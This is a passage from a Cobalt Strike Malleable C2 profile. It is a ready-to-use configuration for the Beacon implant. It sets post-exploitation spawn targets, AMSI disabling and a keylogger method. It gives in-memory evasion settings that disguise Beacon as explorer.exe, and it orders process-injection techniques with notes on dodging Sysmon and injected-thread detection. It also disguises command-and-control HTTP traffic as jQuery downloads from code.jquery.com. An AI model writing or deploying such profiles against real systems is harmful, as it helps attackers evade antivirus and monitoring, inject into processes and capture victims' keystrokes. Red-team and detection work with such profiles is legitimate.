e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
236 print;
237 }
238 }
239
240 client {
241 header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
242 header "Accept-Language" "en-US,en;q=0.5";
243 #header "Host" "code.jquery.com";
244 header "Referer" "http://code.jquery.com/";
245 header "Accept-Encoding" "gzip, deflate";
246 }
247 }
248
249 ################################################
250 ## Post Exploitation
251 ################################################
252 ## Description:
253 ## Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject
254 ## https://www.cobaltstrike.com/help-malleable-postex
255 ## Values:
256 ## spawnto_x86 %windir%\\syswow64\\rundll32.exe
257 ## spawnto_x64 %windir%\\sysnative\\rundll32.exe
258 ## obfuscate false CS 3.14 - Scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way
259 ## pipename postex_####, windows\\pipe_## CS 4.2 - Change the named pipe names used, by post-ex DLLs, to send output back to Beacon. This option accepts a comma-separated list of pipenames. Cobalt Strike will select a random pipe name from this option when it sets up a post-exploitation job. Each # in the pipename is replaced with a valid hex character as well.
260 ## smartinject false CS 3.14 added to postex block - Directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs.
261 ## amsi_disable false CS 3.13 - Directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities.
262 ## keylogger GetAsyncKeyState CS 4.2 - The GetAsyncKeyState option (default) uses the GetAsyncKeyState API to observe keystrokes. The SetWindowsHookEx option uses SetWindowsHookEx to observe keystrokes.
263 ## threadhint CS 4.2 - allows multi-threaded post-ex DLLs to spawn threads with a spoofed start address. Specify the thread hint as "module!function+0x##" to specify the start address to spoof. The optional 0x## part is an offset added to the start address.
264 ## Guidelines
265 ## - spawnto can only be 63 chars
266 ## - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings
267 ## - sysnative for x64 and syswow64 for x86
268 ## - Example x64 : C:\\Windows\\sysnative\\w32tm.exe
269 ## Example x86 : C:\\Windows\\syswow64\\w32tm.exe
270 ## - The binary doesnt do anything wierd (protected binary, etc)
271 ## - !! Don't use these !!
272 ## - "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe"
273 ## - A binary that executes without the UAC
274 ## - 64 bit for x64
275 ## - 32 bit for x86
276 ## - You can add command line parameters to blend
277 ## - set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
278 ## - set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
279 ## - Note: svchost.exe may look weird as the parent process
280 ## - The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block.
281 ## - The amsi_disable option directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities.
282 ## - The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll
283
284 post-ex {
285 # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes
286 set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
287 # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.
288 set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
289 # change the permissions and content of our post-ex DLLs
290 set obfuscate "true";
291 # pass key function pointers from Beacon to its child jobs
292 set smartinject "true";
293 # disable AMSI in powerpick, execute-assembly, and psinject
294 set amsi_disable "true";
295 # Modify our post-ex pipe names
296 set pipename "Winsock2\\CatalogChangeListener-###-0,";
297 set keylogger "GetAsyncKeyState";
298 #set threadhint "module!function+0x##"
299 }
300
301 ################################################
302 ## Memory Indicators
303 ################################################
304 ## Description:
305 ## The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon Reflective DLL.
306 ## Values:
307 ## allocator VirtualAlloc CS 4.2 - Set how Beacon's Reflective Loader allocates memory for the agent. Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
308 ## checksum 0 The CheckSum value in Beacon's PE header
309 ## cleanup false Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it.
310 ## compile_time 14 July 2009 8:14:00 The build time in Beacon's PE header
311 ## entry_point 92145 The EntryPoint value in Beacon's PE header
312 ## image_size_x64 512000 SizeOfImage value in x64 Beacon's PE header
313 ## image_size_x86 512000 SizeOfImage value in x86 Beacon's PE header
314 ## magic_mz_x86 MZRE CS 4.2 - Override the first bytes (MZ header included) of Beacon's Reflective DLL. Valid x86 instructions are required. Follow instructions that change CPU state with instructions that undo the change.
315 ## magic_mz_x64 MZAR CS 4.2 - Same as magic_mz_x86; affects x64 DLL.
316 ## module_x64 xpsservices.dll Same as module_x86; affects x64 loader
317 ## module_x86 xpsservices.dll Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc.
318 ## magic_pe PE Override the PE character marker used by Beacon's Reflective Loader with another value.
319 ## name beacon.x64.dll The Exported name of the Beacon DLL
320 ## obfuscate false Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers. As of 4.2 CS now obfuscates .text section in rDLL package
321 ## rich_header N/A Meta-information inserted by the compiler
322 ## sleep_mask false CS 3.12 - Obfuscate Beacon (HTTP, SMB, TCP Beacons), in-memory, prior to sleeping (HTTP) or waiting for a new connection\data (SMB\TCP)
323 ## smartinject false CS 4.1 added to stage block - Use embedded function pointer hints to bootstrap Beacon agent without walking kernel32 EAT
324 ## stomppe true Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload
325 ## userwx false Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory
326 ## Guidelines:
327 ## - Modify the indicators to minimize in memory indicators
328 # - Refer to
329 ## https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/
330 ## https://www.youtube.com/playlist?list=PL9HO6M_MU2nc5Q31qd2CwpZ8J4KFMhgnK
331 ## https://www.youtube.com/watch?v=AV4XjxYe4GM (Obfuscate and Sleep)
332 stage {
333
334 # CS 4.2 added allocator and MZ header overrides
335 set allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
336 #set magic_mz_x86 "MZRE";
337 #set magic_mz_x64 "MZAR";
338 set magic_pe "NO";
339 set userwx "false";
340 set stomppe "true";
341 set obfuscate "true";
342 set cleanup "true";
343 # CS 3.12 Addition "Obfuscate and Sleep"
344 set sleep_mask "true";
345 # CS 4.1
346 set smartinject "true";
347
348 # Make the Beacon Reflective DLL look like something else in memory
349 # Values captured using peclone agaist a Windows 10 version of explorer.exe
350 set checksum "0";
351 set compile_time "11 Nov 2016 04:08:32";
352 set entry_point "650688";
353 set image_size_x86 "4661248";
354 set image_size_x64 "4661248";
355 set name "srv.dll";
356 set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
357
358 ## WARNING: Module stomping
359 # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
360 # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
361 # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
362 # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
363 # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4
364
365 # set module_x64 "netshell.dll";
366 # set module_x86 "netshell.dll";
367
368 # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
369 transform-x86 { # transform the x86 rDLL stage
370 prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
371 strrep "ReflectiveLoader" "execute"; # Change this text
372 strrep "This program cannot be run in DOS mode" ""; # Remove this text
373 strrep "beacon.dll" ""; # Remove this text
374 }
375 transform-x64 { # transform the x64 rDLL stage
376 prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
377 strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
378 strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
379 }
380
381 stringw "jQuery"; # Add this string to the DLL
382 }
383
384 ################################################
385 ## Process Injection
386 ################################################
387 ## Description:
388 ## The process-inject block in Malleable C2 profiles shapes injected content and controls process injection behavior.
389 ## Values:
390 ## allocator VirtualAllocEx The preferred method to allocate memory in the remote process. Specify VirtualAllocEx or NtMapViewOfSection. The NtMapViewOfSection option is for same-architecture injection only. VirtualAllocEx is always used for cross-arch memory allocations.
391 ## min_alloc 4096 Minimum amount of memory to request for injected content.
392 ## startrwx false Use RWX as initial permissions for injected content. Alternative is RW.
393 ## userwx false Use RWX as final permissions for injected content. Alternative is RX.
394 ##
395 ##
396 ## Use the transform-x86\x64 to pad content injected by Beacon
397 ## Use the execute block to control use of Beacon's process injection techniques
398 ## Guidelines:
399 ## - Modify the indicators to minimize in memory indicators
400 # - Refer to
401 ## https://www.cobaltstrike.com/help-malleable-c2#processinject
402 ## https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/
403
404 process-inject {
405
406 # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection
407 set allocator "NtMapViewOfSection";
408
409 # Minimium memory allocation size when injecting content
410 set min_alloc "17500";
411
412 # Set memory permissions as permissions as initial=RWX, final=RX
413 set startrwx "false";
414 set userwx "false";
415
416 # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append.
417 transform-x86 {
418 prepend "\x90\x90";
419 #append "\x90\x90";
420 }
421
422 transform-x64 {
423 prepend "\x90\x90";
424 #append "\x90\x90";
425 }
426
427 ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include:
428 #
429 # Name x86->x64 x64-x86 Notes
430 #########################################################################
431 # CreateThread Current Process only
432 # CreateRemoteThread Yes No cross-session
433 # NtQueueApcThread
434 # NtQueAPCThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only.
435 # RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection.
436 # SetThreadContext Yes Suspended processes (e.g. post-ex jobs only)
437 execute {
438
439 # The order is important! Each step will be attempted (if applicable) until successful
440 ## self-injection
441 CreateThread "ntdll!RtlUserThreadStart+0x42";
442 CreateThread;
443
444 ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s)
445 # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process.
446 # SetThreadContext;
447 NtQueueApcThread-s;
448
449 ## Injection into existing processes
450 # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products.
451 #NtQueueApcThread;
452
453 # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries
454 # OPSEC - fires Sysmon Event 8
455 CreateRemoteThread;
456
457 # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries
458 # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread
459 RtlCreateUserThread;
460 }
461 }
462 ################################################
463 ## Maleable C2
464 ## https://www.cobaltstrike.com/help-malleable-c2#options
465 ################################################
466 ## HTTP Headers
467 ################################################
468 ## Description:
469 ## The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server. Here, you may specify additional HTTP headers and the HTTP header order.
470 ## Values:
471 ## set headers "Comma separated list of headers" The set headers option specifies the order these HTTP headers are delivered in an HTTP response. Any headers not in this list are added to the end.
472 ## header "headername" "header alue The header keyword adds a header value to each of Cobalt Strike's HTTP responses. If the header value is already defined in a response, this value is ignored.
473 ## set trust_x_forwarded_for "true" Adds this header to determine remote address of a request.
474 ## Guidelines:
475 ## - Use this section in addition to the "server" secion in http-get and http-post to further define the HTTP headers
476
477 http-config {
478 set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
479 header "Server" "Apache";
480 header "Keep-Alive" "timeout=10, max=100";
481 header "Connection" "Keep-Alive";
482 # Use this option if your teamserver is behind a redirector
483 set trust_x_forwarded_for "true";
484 }
485
486 ################################################
487 ## HTTP GET
488 ################################################
489 ## Description:
490 ## GET is used to poll teamserver for tasks
491 ## Defaults:
492 ## uri "/activity"
493 ## Headers (Sample)
494 ## Accept: */*
495 ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
496 ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
497 ## Guidelines:
498 ## - Add customize HTTP headers to the HTTP traffic of your campaign
499 ## - Analyze sample HTTP traffic to use as a reference
500 ## - Multiple URIs can be added. Beacon will randomly pick from these.
501 ## - Use spaces as a URI seperator
502 http-get {
503
504 set uri "/jquery-3.3.1.min.js";
505 set verb "GET";
506
507 client {
508
509 header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
510 #header "Host" "code.jquery.com";
511 header "Referer" "http://code.jquery.com/";
512 header "Accept-Encoding" "gzip, deflate";
513
514 metadata {
515 base64url;
516 prepend "__cfduid=";
517 header "Cookie";
518 }
519 }
520
521 server {
522
523 header "Server" "NetDNA-cache/2.2";
524 header "Cache-Control" "max-age=0, no-cache";
525 header "Pragma" "no-cache";
526 header "Connection" "keep-alive";
527 header "Content-Type" "application/javascript; charset=utf-8";
528
529 output {
530 mask;
531 base64url;
532 ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
533 # 2nd Line
534 prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
535 # 1st Line
536 prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
537 append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
538 print;
539 }
540 }
541 }
542
543 ################################################
544 ## HTTP POST
545 ################################################
546 ## Description:
547 ## POST is used to send output to the teamserver
548 ## Can use HTTP GET or POST to send data
549 ## Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel.
550 ## Defaults:
551 ## uri "/activity"
552 ## Headers (Sample)
553 ## Accept: */*
554 ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
555 ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
556 ## Guidelines:
557 ## - Decide if you want to use HTTP GET or HTTP POST requests for this section
558 ## - Add customize HTTP headers to the HTTP traffic of your campaign
559 ## - Analyze sample HTTP traffic to use as a reference
560 ## Use HTTP POST for http-post section
561 ## Uncomment this Section to activate
562 http-post {
563
564 set uri "/jquery-3.3.2.min.js";
565 set verb "POST";
566
567 client {
568
569 header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
570 #header "Host" "code.jquery.com";
571 header "Referer" "http://code.jquery.com/";
572 header "Accept-Encoding" "gzip, deflate";
573
574 id {
575 mask;
576 base64url;
577 parameter "__cfduid";
578 }
579
580 output {
581 mask;
582 base64url;
583 print;
584 }
585 }
586
587 server {
588
589 header "Server" "NetDNA-cache/2.2";
590 header "Cache-Control" "max-age=0, no-cache";
591 header "Pragma" "no-cache";
592 header "Connection" "keep-alive";
593 header "Content-Type" "application/javascript; charset=utf-8";
594
595 output {
596 mask;
597 base64url;
598 ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
599 # 2nd Line
600 prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
601 # 1st Line
602 prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
603 append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof 